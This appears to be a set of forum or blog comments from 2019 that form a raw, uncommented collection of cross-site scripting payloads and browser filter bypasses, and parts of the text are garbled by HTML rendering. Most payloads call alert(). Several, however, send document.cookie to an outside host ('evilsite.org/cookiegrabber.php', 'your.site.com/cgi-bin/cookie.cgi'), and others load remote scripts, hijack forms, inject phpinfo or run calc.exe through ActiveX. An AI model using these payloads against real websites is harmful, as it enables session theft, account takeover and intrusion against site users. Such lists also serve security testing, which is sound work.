"><script>alert(0)</script>
<script src="http://yoursite.com/your_files.js"></script>
<script>alert(/xss/)</script>
<script>alert(/xss/)</script>


<font style="color:expression(alert(document.cookie))">

<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]

<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
<scr<script>ipt>alert('XSS');ipt>
<script>alert(String.fromCharCode(88,83,83))</script>

<style>@import'javascript:alert("XSS")';</style>
alert("XSS")'); ?>
<marquee><script>alert('XSS')</script></marquee>



window.alert("Bonjour !");
</scr<script></font></noscript>

<font style="color:expression(alert(document.cookie))">
<iframe<?php chr(11)?="" echo=""> onload=alert('XSS')>
"><script alert(string.fromcharcode(88,83,83))<="" script="">
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee>

XSS

</marquee>
<meta content="0;url=javascript:alert('XSS');" http-equiv="refresh">
<meta content="0; URL=http://;URL=javascript:alert('XSS');" http-equiv="refresh">
<script>var var = 1; alert(var)</script>
<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>
alert("XSS")'?>

" onfocus=alert(document.domain) "> <"

<style>li {list-style-image: url("javascript:alert('XSS')");}</style>
  • XSS
    perl -e 'print "<scr\0ipt>alert("XSS")</scr\0ipt>";' > out
    perl -e 'print "";' > out


    <scrscriptipt>alert(1)</scrscriptipt>


    <script>alert(1)</script>
    <script>document.write("XSS");</script>
    a="get";b="URL";c="javascript:";d="alert('xss');";eval(a?);
    ='><script>alert("xss")</script>
    <form action="javas cript:alert(1)">
    <label>This is a searchable index. Enter search keywords: <input name="isindex" type="image"></label>
    </form>
    <script?=">"?="yoursite.com/xss.js?69,69">
    <script>alert(navigator.userAgent)</script>>
    ">/XaDoS/><script>alert(document.cookie)</script>
    <script> src="www.site.com/XSS.js"></script>
    ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
    src="www.site.com/XSS.js">
    ">
    [color=red width=expression(alert(123))][color]
    <base href="javascript:alert('XSS');//">
    Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
    "><script>alert(123)</script></script?=">
</iframe<?php></font>
TheKingOfDuck
2019-03-09 11:16 0 Reply

IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0″//(%000000%0dalert(1)// #IE #0day

new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri


<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox


<script for= event=onerror()>alert(/@ma1/)</script><img id= src=> #IE

"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato

Components.lookupMethod(self, 'alert')(1) #firefox

external.NavigateAndFind(' ',[],[]) #IE #URLredirect

<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke


<meta http-equiv=refresh content="0 javascript:alert(1)"> #opera


<meta http-equiv=refresh content="?,javascript:alert(1)"> #chrome


<svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript<br>
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox</p>
<p><svg>&lt;/ y="&gt;&lt;x" onload=alert('@0x6D6172696F')&gt; #svg<br>
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera<br>
URL-redirect vuln == XSS ! Location:data:text/html,&lt;svg/onload=alert(document.domain)&gt; #Opera @jackmasa<br>
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>​ #Chrome #XSS @RSnake<br>
Clipboard-hijack without script and css: http://&lt;bdo dir=rtl&gt;elgoog&lt;/bdo&gt;.com<br>
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa<br>
$=&lt;&gt;@mozilla.org/js/function&lt;/&gt;;$::<a href="/@superevr/">&lt;&gt;alert&lt;/&gt;</a> #firefox<br>
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa</p>
<p><svg><script>location&equals;&#60&#62javascript&amp;#x3A;alert(1)&#60&#33&#47&#62;</script> #Firefox #JustForFun

Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a>


<style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style>

<input #ie="" #xss<br="" &gt;="" value="--&gt;&lt;body/onload=&lt;code&gt;alert(/ @jackmasa /)//&lt;/code&gt;">
Input[hidden] XSS <input type=hidden style=x:expression(alert(/ @garethheyes /))> target it.

Firefox clipboard-hijack without script and css : http://

<![<img src=x:x onerror=alert(/ @jackmasa /)//]-->


E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes


vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356


({})[$='\143\157\156\163\164\162\165\143\164\157\162']$()

No referer : <iframe src="javascript:'&lt;script src=&gt;;&lt;/script&gt;'"></iframe>


<svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg>​


VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]


if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console


<svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar</svg>

![if<iframe/onload=vbs::alert[:] #IE by @0x6D6172696F, @jackmasa


<svg>script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊= mix! #opera by @jackmasa</svg>

<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS

document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS

header('Refresh: 0;url=javascript:alert(1)');


<script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::">

click


CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style>


ES #FF for(location of ['javascript:alert(/ff/)']);


E4X function::['location']='javascript'':alert(/FF/)'


HTML5 entity char test


Firefox click <script>eval(test'')</script> by @cgvwzq


CSS and CSS :P

toUpperCase XSS document.write('<ı onclıck=&#97&#108&#101&#114&#116&#40&#49&#41>asd</ı>'.toUpperCase()) by @jackmasa

IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("<iframe src=vbscript:alert(1)>") by @masa141421356

aha <script src=>alert(/IE|Opera/)</script>

Opera bug? <img src=//\ onload=alert(1)>

Use 127.1 no 127.0.0.1 by @jackmasa

IE vector location='&#118&#98&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'


jQuery super less-xss,work in IE: $(URL) 6 chars


Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap


innerText DOM XSS: innerHTML=innerText

Using IE XSS filter or Chrome xss auditor to block <meta> url redirect.

jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>')

IE all version CSRF vector <img lowsrc=//blog.zsec.uk>

Timing vector <img src=//ixss.sinaapp.com/sleep.php>

Firefox data uri can inherit dom-access. <iframe src="data:D,&lt;script&gt;alert(top.document.body.innerHTML)&lt;/script&gt;"><br>
IE9 &lt;script/onload=alert(1)&gt;&lt;/script&gt;<br>
Webkit and FF &lt;style/onload=alert(1)&gt;<br>
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P<br>
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')<br>
If you want to share your cool vector, please do not hesitate to let me know :)<br>
ASP trick: ?input1=&lt;script/&amp;in%u2119ut1=&gt;al%u0117rt('1')&lt;/script&gt; by @IRSDL</p>
<p><iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F<br>
try{*}catch(e if(alert(1))){} by @garethheyes<br>
ß=ss <a href="http://ß.lv">click</a> by @_cweb<br>
<a href="http://www。example。com">click</a> by @_cweb<br>
Firefox link host dom xss <a href="https://t.co/aTtzHaaG">https://t.co/aTtzHaaG</a> by @garethheyes<br>
<a href="http://www﹒example﹒com ">click</a> by @_cweb<br>
history.pushState([],[],'/xssvector') HTML5 URL spoofing!<br>
Clickjacking with history.forward() and history.back() by @lcamtuf<br>
Inertia-Clickjacking for(i=10;i&gt;1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul<br>
XHTML Entity Hijacking [&lt;!ENTITY nbsp "'"&gt;] by @masa141421356<br>
Firefox &lt;img src=javascript:while([{}]);&gt;<br>
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115<br>
Firefox funny vector for(i=0;i&lt;100;) find(); by @garethheyes</p>
<p><script>var location={};</script><br>
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} &lt;script src=... charset=utf-7&gt;&lt;/script&gt;<br>
Firefox &lt;iframe src=view-source://xxxx.com&gt;; with drag and drop</p>
<p>&lt;button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"&gt;<plaintext> form hijacking &lt;img src='//evil by @lcamtuf<br>
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F

DOM clobbering:<form name=location > clobbered location object on IE.

DOM clobbering:<form name=document><image name=body> clobbered document->body


<isindex formaction=javascript:alert(1)> by @jackmasa

Classic IE backtick DOM XSS: <script>document.body.innerHTML=''</script>

Firefox click=>google by @garethheyes

click by @kkotowicz

Opera click variant base64 encode. by @jackmasa

Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88</svg>

Webkit and Opera click

FF click url trick by @jackmasa

IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat

<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F

click

FF no referrer by @sneak_


TheKingOfDuck
2019-03-09 11:13 0 Reply

test:

"/><img src=x onerror=alert('test')/>

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>/alert()/

javascript://--></script></title></style>"/</textarea>/<alert()/' onclick=alert()//>a

javascript://</title>"/</script></style></textarea/-->/<alert()/' onclick=alert()//>/

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>/alert()/

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>/alert()/

javascript://</title></textarea></style></script --><li '//" '/alert()/', onclick=alert()//

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>/alert()/

--></script></title></style>"/</textarea><a' onclick=alert()//>/alert()/

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>/alert()/

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</style/</script/--><p" onclick=alert()//>/alert()/

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><script>alert(String.fromCharCode(88,83,83))</script>

“ onclick=alert(1)//<button ‘ onclick=alert(1)//> / alert(1)//

'">><marquee></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>
/alert()/

javascript://--></script></title></style>"/</textarea>
/<alert()/' onclick=alert()//>a

javascript://</title>"/</script></style></textarea/-->
/<alert()/' onclick=alert()//>/

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>
/alert()/

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>
/alert()/

javascript://</title></textarea></style></script --><li '//" '
/alert()/', onclick=alert()//

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>
/alert()/

--></script></title></style>"/</textarea><a' onclick=alert()//>
/alert()/

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>
/alert()/

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</style/</script/--><p" onclick=alert()//>
/alert()/*

< script > < / script>

&lt

<

&LT

<

<

<<

<<<

"><script>"</p>
<p><script>alert("XSS")</script>

<<script>alert("XSS");//<</script>


<script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

'><script>alert(document.cookie);</script>

";alert('XSS');//

%3cscript%3ealert("XSS");%3c/script%3e

%3cscript%3ealert(document.cookie);%3c%2fscript%3e

%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E

&ltscript&gtalert(document.cookie);</script>

&ltscript&gtalert(document.cookie);&ltscript&gtalert


<xss><script>alert('XSS')</script></vulnerable></xss>


IMG%20SRC='javascript:alert(document.cookie)'



<IMG SRC="javascript:alert('XSS')"


<IMG SRC=javascript:alert('XSS')>


<IMG SRC=JaVaScRiPt:alert('XSS')>


<IMG SRC=javascript:alert("XSS")>


<IMG SRC=javascript:alert("'XSS'")>


<IMG """><script>alert("XSS")</script>">


<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


<IMG%20SRC='javasc ript:alert(document.cookie)'>

IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'


<IMG SRC=javascript:alert('XSS')>


<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>


<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E

"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?' +document.cookie</script>

%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<script>alert(String.fromCharCode(88,83,83))</script>=&{}

'';!--"<xss>=&{()}</xss>


<name>','')); phpinfo(); exit;/*</name>

<![CDATA[<script>var n=0;while(true){n;}</script>]]>

<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>

<?xml version="1.0" encoding="ISO-8859-1"?><foo>SCRIPT]]>alert('XSS');/SCRIPT]]></foo>


<xml ID=I><x><c><![CDATA[]]></c></x>


<xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<img language=vbs src=<b onerror=alert#1/1#>

Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'

Reverse 401 basic auth phishing by @jackmasa POC:

document.domain='com' chrome/safari same domain suffix cross-domain trick.

Safari empty location bar bug by @jackmasa POC:

Safari location object pollution tech: by @kinugawamasato

Safari URL spoofing about://mmme.me POC:

Opera URL spoofing vuln data://mmme.me by @jackmasa POC:

Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera

New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F

Opera data:message/rfc822 #XSS by @insertScript


IE <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>


IE cool expression xss



Clever webkit xss auditor bypass trick <script?=data:,alert(1)<!-- by @cgvwzq

Bypass IE8 version flash document object protection by @jackmasa

Bypass IE all version flash document object protection by @gainover1

Bypass IE9 flash document object protection by @irsdl

Bypass IE8 flash document object protection by @irsdl

New XSS vector (#Opera Specific) <svg><scRipt %00>prompt(/@soaj1664ashar/)</svg>

IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day


<iframe srcdoc="&lt;svg/onload=alert(/@80vul/)&gt;"></iframe> #chrome

TheKingOfDuck
2019-03-09 10:59 0 Reply

This is a test:


<img src=x onerror=confirm(CoolCat)><plaintext/onmouseover=prompt("CoolCat")>